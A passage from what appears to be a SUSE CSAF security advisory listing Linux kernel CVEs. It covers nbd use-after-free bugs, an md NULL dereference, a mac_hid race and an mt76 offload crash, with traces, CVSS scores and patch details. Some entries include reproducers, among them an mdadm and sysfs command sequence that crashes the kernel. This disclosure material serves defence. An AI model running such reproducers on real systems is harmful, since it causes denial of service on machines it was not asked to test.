pmd=0000000000000000\n[ 297.523532] Internal error: Oops: 0000000096000005 [#1] SMP\n[ 297.715393] CPU: 2 UID: 0 PID: 45 Comm: kworker/u16:2 Tainted: G O 6.12.50 #0\n[ 297.723908] Tainted: [O]=OOT_MODULE\n[ 297.727384] Hardware name: Banana Pi BPI-R4 (2x SFP+) (DT)\n[ 297.732857] Workqueue: nf_ft_offload_del nf_flow_rule_route_ipv6 [nf_flow_table]\n[ 297.740254] pstate: 60400005 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n[ 297.747205] pc : mt76_wed_offload_disable+0x64/0xa0 [mt76]\n[ 297.752688] lr : mtk_wed_flow_remove+0x58/0x80\n[ 297.757126] sp : ffffffc080fe3ae0\n[ 297.760430] x29: ffffffc080fe3ae0 x28: ffffffc080fe3be0 x27: 00000000deadbef7\n[ 297.767557] x26: ffffff80c5ebca00 x25: 0000000000000001 x24: ffffff80c85f4c00\n[ 297.774683] x23: ffffff80c1875b78 x22: ffffffc080d42cd0 x21: ffffffc080660018\n[ 297.781809] x20: ffffff80c6a076d0 x19: ffffff80c6a043c8 x18: 0000000000000000\n[ 297.788935] x17: 0000000000000000 x16: 0000000000000001 x15: 0000000000000000\n[ 297.796060] x14: 0000000000000019 x13: ffffff80c0ad8ec0 x12: 00000000fa83b2da\n[ 297.803185] x11: ffffff80c02700c0 x10: ffffff80c0ad8ec0 x9 : ffffff81fef96200\n[ 297.810311] x8 : ffffff80c02700c0 x7 : ffffff80c02700d0 x6 : 0000000000000002\n[ 297.817435] x5 : 0000000000000400 x4 : 0000000000000000 x3 : 0000000000000000\n[ 297.824561] x2 : 0000000000000001 x1 : 0000000000000800 x0 : ffffff80c6a063c8\n[ 297.831686] Call trace:\n[ 297.834123] mt76_wed_offload_disable+0x64/0xa0 [mt76]\n[ 297.839254] mtk_wed_flow_remove+0x58/0x80\n[ 297.843342] mtk_flow_offload_cmd+0x434/0x574\n[ 297.847689] mtk_wed_setup_tc_block_cb+0x30/0x40\n[ 297.852295] nf_flow_offload_ipv6_hook+0x7f4/0x964 [nf_flow_table]\n[ 297.858466] nf_flow_rule_route_ipv6+0x438/0x4a4 [nf_flow_table]\n[ 297.864463] process_one_work+0x174/0x300\n[ 297.868465] worker_thread+0x278/0x430\n[ 297.872204] kthread+0xd8/0xdc\n[ 297.875251] ret_from_fork+0x10/0x20\n[ 297.878820] Code: 928b5ae0 8b000273 91400a60 f943fa61 (79401421)\n[ 297.884901] ---[ end trace 0000000000000000 ]---\n\nFix the issue detecting the proper wed reference to use running wed\ncallabacks.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68360",
"url": "https://www.suse.com/security/cve/CVE-2025-68360"
},
{
"category": "external",
"summary": "SUSE Bug 1255536 for CVE-2025-68360",
"url": "https://bugzilla.suse.com/1255536"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68360"
},
{
"cve": "CVE-2025-68361",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68361"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nerofs: limit the level of fs stacking for file-backed mounts\n\nOtherwise, it could cause potential kernel stack overflow (e.g., EROFS\nmounting itself).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68361",
"url": "https://www.suse.com/security/cve/CVE-2025-68361"
},
{
"category": "external",
"summary": "SUSE Bug 1255526 for CVE-2025-68361",
"url": "https://bugzilla.suse.com/1255526"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68361"
},
{
"cve": "CVE-2025-68366",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68366"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnbd: defer config unlock in nbd_genl_connect\n\nThere is one use-after-free warning when running NBD_CMD_CONNECT and\nNBD_CLEAR_SOCK:\n\nnbd_genl_connect\n nbd_alloc_and_init_config // config_refs=1\n nbd_start_device // config_refs=2\n set NBD_RT_HAS_CONFIG_REF\t\t\topen nbd // config_refs=3\n recv_work done // config_refs=2\n\t\t\t\t\t\tNBD_CLEAR_SOCK // config_refs=1\n\t\t\t\t\t\tclose nbd // config_refs=0\n refcount_inc -\u003e uaf\n\n------------[ cut here ]------------\nrefcount_t: addition on 0; use-after-free.\nWARNING: CPU: 24 PID: 1014 at lib/refcount.c:25 refcount_warn_saturate+0x12e/0x290\n nbd_genl_connect+0x16d0/0x1ab0\n genl_family_rcv_msg_doit+0x1f3/0x310\n genl_rcv_msg+0x44a/0x790\n\nThe issue can be easily reproduced by adding a small delay before\nrefcount_inc(\u0026nbd-\u003econfig_refs) in nbd_genl_connect():\n\n mutex_unlock(\u0026nbd-\u003econfig_lock);\n if (!ret) {\n set_bit(NBD_RT_HAS_CONFIG_REF, \u0026config-\u003eruntime_flags);\n+ printk(\"before sleep\\n\");\n+ mdelay(5 * 1000);\n+ printk(\"after sleep\\n\");\n refcount_inc(\u0026nbd-\u003econfig_refs);\n nbd_connect_reply(info, nbd-\u003eindex);\n }",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68366",
"url": "https://www.suse.com/security/cve/CVE-2025-68366"
},
{
"category": "external",
"summary": "SUSE Bug 1255622 for CVE-2025-68366",
"url": "https://bugzilla.suse.com/1255622"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68366"
},
{
"cve": "CVE-2025-68367",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68367"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmacintosh/mac_hid: fix race condition in mac_hid_toggle_emumouse\n\nThe following warning appears when running syzkaller, and this issue also\nexists in the mainline code.\n\n ------------[ cut here ]------------\n list_add double add: new=ffffffffa57eee28, prev=ffffffffa57eee28, next=ffffffffa5e63100.\n WARNING: CPU: 0 PID: 1491 at lib/list_debug.c:35 __list_add_valid_or_report+0xf7/0x130\n Modules linked in:\n CPU: 0 PID: 1491 Comm: syz.1.28 Not tainted 6.6.0+ #3\n Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014\n RIP: 0010:__list_add_valid_or_report+0xf7/0x130\n RSP: 0018:ff1100010dfb7b78 EFLAGS: 00010282\n RAX: 0000000000000000 RBX: ffffffffa57eee18 RCX: ffffffff97fc9817\n RDX: 0000000000040000 RSI: ffa0000002383000 RDI: 0000000000000001\n RBP: ffffffffa57eee28 R08: 0000000000000001 R09: ffe21c0021bf6f2c\n R10: 0000000000000001 R11: 6464615f7473696c R12: ffffffffa5e63100\n R13: ffffffffa57eee28 R14: ffffffffa57eee28 R15: ff1100010dfb7d48\n FS: 00007fb14398b640(0000) GS:ff11000119600000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000000000000000 CR3: 000000010d096005 CR4: 0000000000773ef0\n DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n PKRU: 80000000\n Call Trace:\n \u003cTASK\u003e\n input_register_handler+0xb3/0x210\n mac_hid_start_emulation+0x1c5/0x290\n mac_hid_toggle_emumouse+0x20a/0x240\n proc_sys_call_handler+0x4c2/0x6e0\n new_sync_write+0x1b1/0x2d0\n vfs_write+0x709/0x950\n ksys_write+0x12a/0x250\n do_syscall_64+0x5a/0x110\n entry_SYSCALL_64_after_hwframe+0x78/0xe2\n\nThe WARNING occurs when two processes concurrently write to the mac-hid\nemulation sysctl, causing a race condition in mac_hid_toggle_emumouse().\nBoth processes read old_val=0, then both try to register the input handler,\nleading to a double list_add of the same handler.\n\n CPU0 CPU1\n ------------------------- -------------------------\n vfs_write() //write 1 vfs_write() //write 1\n proc_sys_write() proc_sys_write()\n mac_hid_toggle_emumouse() mac_hid_toggle_emumouse()\n old_val = *valp // old_val=0\n old_val = *valp // old_val=0\n mutex_lock_killable()\n proc_dointvec() // *valp=1\n mac_hid_start_emulation()\n input_register_handler()\n mutex_unlock()\n mutex_lock_killable()\n proc_dointvec()\n mac_hid_start_emulation()\n input_register_handler() //Trigger Warning\n mutex_unlock()\n\nFix this by moving the old_val read inside the mutex lock region.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68367",
"url": "https://www.suse.com/security/cve/CVE-2025-68367"
},
{
"category": "external",
"summary": "SUSE Bug 1255547 for CVE-2025-68367",
"url": "https://bugzilla.suse.com/1255547"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68367"
},
{
"cve": "CVE-2025-68368",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68368"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmd: init bioset in mddev_init\n\nIO operations may be needed before md_run(), such as updating metadata\nafter writing sysfs. Without bioset, this triggers a NULL pointer\ndereference as below:\n\n BUG: kernel NULL pointer dereference, address: 0000000000000020\n Call Trace:\n md_update_sb+0x658/0xe00\n new_level_store+0xc5/0x120\n md_attr_store+0xc9/0x1e0\n sysfs_kf_write+0x6f/0xa0\n kernfs_fop_write_iter+0x141/0x2a0\n vfs_write+0x1fc/0x5a0\n ksys_write+0x79/0x180\n __x64_sys_write+0x1d/0x30\n x64_sys_call+0x2818/0x2880\n do_syscall_64+0xa9/0x580\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n\nReproducer\n```\n mdadm -CR /dev/md0 -l1 -n2 /dev/sd[cd]\n echo inactive \u003e /sys/block/md0/md/array_state\n echo 10 \u003e /sys/block/md0/md/new_level\n```\n\nmddev_init() can only be called once per mddev, no need to test if bioset\nhas been initialized anymore.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68368",
"url": "https://www.suse.com/security/cve/CVE-2025-68368"
},
{
"category": "external",
"summary": "SUSE Bug 1255527 for CVE-2025-68368",
"url": "https://bugzilla.suse.com/1255527"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68368"
},
{
"cve": "CVE-2025-68372",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68372"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnbd: defer config put in recv_work\n\nThere is one uaf issue in recv_work when running NBD_CLEAR_SOCK and\nNBD_CMD_RECONFIGURE:\n nbd_genl_connect // conf_ref=2 (connect and recv_work A)\n nbd_open\t // conf_ref=3\n recv_work A done // conf_ref=2\n NBD_CLEAR_SOCK // conf_ref=1\n nbd_genl_reconfigure // conf_ref=2 (trigger recv_work B)\n close nbd\t // conf_ref=1\n recv_work B\n config_put // conf_ref=0\n atomic_dec(\u0026config-\u003erecv_threads); -\u003e UAF\n\nOr only running NBD_CLEAR_SOCK:\n nbd_genl_connect // conf_ref=2\n nbd_open \t // conf_ref=3\n NBD_CLEAR_SOCK // conf_ref=2\n close nbd\n nbd_release\n config_put // conf_ref=1\n recv_work\n config_put \t // conf_ref=0\n atomic_dec(\u0026config-\u003erecv_threads); -\u003e UAF\n\nCommit 87aac3a80af5 (\"nbd: call nbd_config_put() before notifying the\nwaiter\") moved nbd_config_put() to run before waking up the waiter in\nrecv_work, in order to ensure that nbd_start_device_ioctl() would not\nbe woken up while nbd-\u003etask_recv was still uncleared.\n\nHowever, in nbd_start_device_ioctl(), after being woken up it explicitly\ncalls flush_workqueue() to make sure all current works are finished.\nTherefore, there is no need to move the config put ahead of the wakeup.\n\nMove nbd_config_put() to the end of recv_work, so that the reference is\nheld for the whole lifetime of the worker thread. This makes sure the\nconfig cannot be freed while recv_work is still running, even if clear\n+ reconfigure interleave.\n\nIn addition, we don\u0027t need to worry about recv_work dropping the last\nnbd_put (which causes deadlock):\n\npath A (netlink with NBD_CFLAG_DESTROY_ON_DISCONNECT):\n connect // nbd_refs=1 (trigger recv_work)\n open nbd // nbd_refs=2\n NBD_CLEAR_SOCK\n close nbd\n nbd_release\n nbd_disconnect_and_put\n flush_workqueue // recv_work done\n nbd_config_put\n nbd_put // nbd_refs=1\n nbd_put // nbd_refs=0\n queue_work\n\npath B 